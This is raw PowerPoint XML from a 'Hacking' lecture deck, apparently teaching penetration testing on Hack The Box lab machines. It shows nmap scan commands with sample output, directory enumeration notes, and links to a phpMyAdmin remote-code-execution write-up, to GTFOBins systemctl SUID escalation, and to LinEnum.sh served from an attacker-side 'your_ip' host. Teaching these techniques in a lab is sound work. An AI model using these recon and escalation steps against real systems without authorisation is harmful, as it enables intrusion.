        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35424692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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4058541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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28518758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69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33991083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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1214133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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3465654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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22707538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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4356738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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32001093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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37783697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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1008814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suggest </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NMAPing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the target at this point in the lecture.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D1C3268F-D626-3B44-A83B-93E6C29000A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13301611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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20703844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3268F-D626-3B44-A83B-93E6C29000A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2614970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it would be a good idea to kick off DIRBUSTER in the lecture at this point as well.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D1C3268F-D626-3B44-A83B-93E6C29000A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4187157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test the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> command</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D1C3268F-D626-3B44-A83B-93E6C29000A0}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1591422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1/21/20</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2627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1/21/20</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47432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1/21/20</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0430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1/21/20</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5883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1/21/20</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2330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1/21/20</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94425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1/21/20</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93284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1/21/20</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05759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1/21/20</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58856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1/21/20</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304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1/21/20</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0205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1/21/20</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69338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8" r:id="rId6"/>
    <p:sldLayoutId id="2147483673" r:id="rId7"/>
    <p:sldLayoutId id="2147483674" r:id="rId8"/>
    <p:sldLayoutId id="2147483675" r:id="rId9"/>
    <p:sldLayoutId id="2147483677" r:id="rId10"/>
    <p:sldLayoutId id="2147483676"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54.tiff"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout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10.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://courses.lumenlearning.com/wm-englishcomposition1/chapter/outcome-voice/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing10.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors10.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54.tiff"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1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Data" Target="../diagrams/data11.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://courses.lumenlearning.com/wm-englishcomposition1/chapter/outcome-voice/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing11.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors11.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54.tiff"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout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12.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://courses.lumenlearning.com/wm-englishcomposition1/chapter/outcome-voice/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing12.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors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image" Target="../media/image56.gif"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data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courses.lumenlearning.com/wm-englishcomposition1/chapter/outcome-voice/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.tiff"/><Relationship Id="rId9"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58.sv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10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.tiff"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout15.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.sv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58.sv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58.sv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58.sv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58.sv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58.sv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58.sv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58.svg"/></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hackthebox.eu/" TargetMode="Externa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58.sv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58.sv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41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image69.gif"/><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45.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><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60.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8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hyperlink" Target="https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e"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raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"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your_ip/LinEnum.sh"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raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"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hyperlink" Target="http://your_ip/LinEnum.sh"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tfobins.github.io/gtfobins/systemctl/#suid"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tfobins.github.io/gtfobins/systemctl/#suid"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gtfobins.github.io/gtfobins/systemctl/#suid"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gtfobins.github.io/gtfobins/systemctl/#suid"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www.shellhacks.com/systemd-service-file-example/"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15EF3-5473-43A5-9D59-FADA82A9417E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="6448" b="10526"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="10"/>
            <a:ext cx="12191999" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 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1B3C8D-3315-D34D-9AB3-91D1DE71F0E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735791" y="3331444"/>
            <a:ext cx="6470692" cy="1229306"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FFB1FF2-7772-8A42-81BA-6CD018557FAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735791" y="4735799"/>
            <a:ext cx="6470693" cy="605256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>With Anthony Pipia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11"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111708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Scanning</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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3444355514"/>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609695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Scanning</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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3007594970"/>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F52B68D8-8289-374C-A736-73DDC9D1F36F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4793294" y="1157230"/>
            <a:ext cx="5611941" cy="4507846"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port Scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>By Default:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Top 1000 Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 parts of a 3-way handshake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 10.10.10.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –O –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>target.nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 10.10.10.143</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deafult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ervice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ersion enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>perating System detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utput </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ormal [FILENAME]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C8DD45A-2B58-0A40-A336-6A0EAE19C4FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8849927" y="1185319"/>
            <a:ext cx="2699814" cy="1478059"/>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rgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PORT   STATE SERVICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> open  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> open  http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257000594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Scanning</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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="910154423"/>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3204FCD7-28CF-7842-94C1-6A9627BA1090}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4793294" y="1157230"/>
            <a:ext cx="5611941" cy="1386273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory Enumeration (Web Crawling)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Takes a word list and automates mapping a website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{551BD701-AC89-D044-B477-CA697A1B7096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8671995" y="3432842"/>
            <a:ext cx="2510187" cy="2532993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="26000">
                <a:srgbClr val="216B75">
                  <a:alpha val="26000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg2">
                  <a:lumMod val="99000"/>
                  <a:lumOff val="1000"/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="54000">
                <a:schemeClr val="accent1">
                  <a:shade val="67500"/>
                  <a:satMod val="115000"/>
                  <a:alpha val="49000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="75000">
                <a:srgbClr val="0F4E53">
                  <a:alpha val="26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8B9D98-401E-9943-AD8C-8CC646AE690A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="4210761"/>
            <a:ext cx="5884677" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
